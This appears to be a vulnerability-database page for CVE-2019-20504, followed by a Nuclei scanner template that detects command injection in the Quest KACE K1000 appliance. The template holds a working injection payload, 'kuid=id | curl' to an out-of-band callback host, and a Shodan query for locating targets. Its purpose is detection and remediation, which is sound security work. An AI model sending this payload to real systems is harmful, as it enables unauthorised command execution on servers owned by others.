Family (all 10 entries)

| Reporter | Title | Published | Views |
|---|---|---|---|
| circl | CVE-2019-20504 | 23 May 2025 21:02 | – |
| cnvd | Quest Software KACE K1000 Systems Management Appliance Code Execution Vulnerability | 10 Mar 2020 00:00 | – |
| cve | CVE-2019-20504 | 9 Mar 2020 00:55 | – |
| cvelist | CVE-2019-20504 | 9 Mar 2020 00:55 | – |
| nvd | CVE-2019-20504 | 9 Mar 2020 01:15 | – |
| osv | CVE-2019-20504 | 9 Mar 2020 01:15 | – |
| prion | Code injection | 9 Mar 2020 01:15 | – |
| redhatcve | CVE-2019-20504 | 22 May 2025 08:28 | – |
| ubuntucve | CVE-2019-20504 | 6 Mar 2020 20:15 | – |
| vulncheck_kev | VulnCheck KEV: CVE-2019-20504 | 29 Jun 2024 00:00 | – |
```yaml
id: CVE-2019-20504

info:
  name: Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands via shell metacharacters, leading to complete server compromise and access to all managed systems.
  remediation: |
    Upgrade to KACE K1000 version 6.4 SP3 (6.4.120822) or later.
  reference:
    - https://www.exploit-db.com/exploits/46684
    - https://www.rcesecurity.com/2019/04/dell-kace-k1000-remote-code-execution-the-story-of-bug-k1-18652/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-20504
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-20504
    cwe-id: CWE-78
    epss-score: 0.0955
    epss-percentile: 0.94869
    cpe: cpe:2.3:a:quest:kace_systems_management:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: quest
    product: kace_systems_management
    shodan-query: html:"K1000 Logo"
  tags: cve,cve2019,k1000,kace,rce,vkev,vuln

flow: http(1) && http(2)

http:
  # Request 1: fingerprint the appliance; the match is internal, so it only gates request 2.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "K1000")'
        internal: true

  # Request 2: the out-of-band check against the vulnerable endpoint.
  - raw:
      - |
        POST /service/krashrpt.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        kuid=id | curl http://{{interactsh-url}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS interaction
        words:
          - "dns"
# digest: 4a0a00473045022100cf08776158004f46d41523eaa18cd82ee3e13885ff759bf7fbbd93714561243202202bfc052d6532bc72cb1144b48ce8f9456bf5ba3a6fc6ef84f032b63353e6600d:922c64590222798bb761d5b6d8e72950
```